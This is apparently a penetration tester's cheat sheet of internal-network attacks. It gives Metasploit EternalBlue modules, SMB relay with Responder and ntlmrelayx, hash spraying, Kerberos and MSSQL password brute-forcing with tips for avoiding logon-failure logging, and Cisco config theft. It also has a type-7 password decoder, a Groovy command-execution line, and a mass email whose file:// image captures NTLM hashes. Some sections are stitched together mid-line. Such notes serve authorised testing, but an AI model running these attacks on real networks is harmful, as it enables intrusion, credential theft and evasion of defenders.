Grep host IP addresses with 445/tcp open and save to a file, 445.txt.
Run RunFinger.py in the Responder repository (make sure you use the script utility or tee to save the output):
while read -r line;do ./RunFinger.py -i $line -g;done <445.txt
Grep the RunFinger.py output for 'MS17-010: True'.
-OR-
Metasploit:
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/admin/smb/ms17_010_command
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue_win8
use exploit/windows/smb/ms17_010_psexec
Run crackmapexec with the --gen-relay-list option to generate a file containing hosts that don't require SMB Signing.
Run Impacket ntlmrelayx with the -tf option specifying the file from the previous step.
./ntlmrelayx [-t [target IP] | -tf [targetsfile] (from --gen-relay-list)] -l [LOOTDIR] -of [outputfile]
Rerun Responder:
./Responder.py -I <interface> -wrd
Monitor ntlmrelayx output for any hashes that get dumped. If you get some, use crackmapexec to spray hashes across the network to discover systems that reuse the same local administrator account credentials.
No admin - SOL?
Modifications to ntlmrelayx
• Ropnop modified ntlmrelayx to not “waste” unprivileged SMB connections • Added two new options
• '--enum-local-admins'
• If the command execution fails, query local SAM for who has the right privileges
• --rid-cycle
• If the command execution fails, perform a RID cycle attack using LSAT to enumerate domain objects and save the result to a CSV • Ropnop's branch here:
• https://github.com/ropnop/impacket/tree/feature/enum_unprivdn
Password Guessing with Kerberos (From Ropnop, https://github.com/ropnop/kerberos_windows_scripts)
-
kinit_horizontal_brute.sh : Much less noise than SMB spraying and blue team is less likely to see failed attempts in the logs because Kerberos pre-authentication doesn't trigger a Logon Failure event (4625). It does trigger event 4771, "Kerberos pre-authentication failed" which is less likely to be logged than 4625.
-
Note from Ropnop's slides: Putting an IP address for the DC saves DNS lookups and makes this work faster.
medusa -H scans/mssql-hosts.txt -u sa -P ./default-mssql-passwords.txt -M mssql |tee /root/logs/mssql-passwords.log
Blank password:
medusa -H scans/mssql-hosts.txt -u sa -e ns -M mssql |tee /root/logs/mssql-passwords.log
Everything that you need to know: https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
Use SIET or Metasploit module to test for smart-install or download vulnerable device configurations. Once you've downloaded device configurations, look for plaintext passwords, type 7 passwords which are easily cracked, and SNMP community strings. Try to use found credentials to login to the devices and use creds to password spray telnet and ssh. On some devices you may be able to run perform a packet capture to sift for credentials.
https://github.com/Sab0tag3d/SIET
Test:
python siet.py -l <file with IP's> -t
Download configs:
python siet.py -l <file with IP's> -g
Crack Type 7 hashes type7.py (@averagesecguy) :
import sys
V = [0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e,
0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44,
0x48, 0x53, 0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39,
0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76, 0x39, 0x38, 0x37, 0x33,
0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66, 0x67, 0x38, 0x37]
if len(sys.argv) != 2:
print("Usage: type7.py hash")
sys.exit(0)
hash = sys.argv[1]
i = int(hash[:2], 16)
r = ""
for j in range(2, len(hash) - 2, 2):
h = int(hash[j:j+2], 16)
r = r + chr(h ^ V[i])
i = (i + 1) % 53
print rExecute commands:
println "cmd /c whoami".execute().text
An exploit for Apache Struts CVE-2017-5638: https://github.com/mazen160/struts-pwn
First, configure your system to capture hashes (Responder) or relay (Impacket ntlmrelayx.py). Put recipient email addresses in file emailaddresses.txt.
Content of msg-body.txt:
<p>Hello,</p>
<p>[Insert name/company here] is testing for an open SMTP relay. Please forward this to me once you receive it.</p>
<p>Regards,</p>
<p>[Name]</p>
<p>Security Consultant, Penetration Testing</p>
<p>[Company]</p>
<p>[phone]</p>
<p>[email address]</p>
<p><img src="file://[PTK IP address]/pic.jpg" alt="Download Images" /></p>
Bash shell:
while read -r line;do sendemail -f [from address] -t $line -u "Rapid7 open SMTP relay test" -o message-file=msg-body.txt message-content-type=html -s [IP address]:25;done <emailaddresses.txt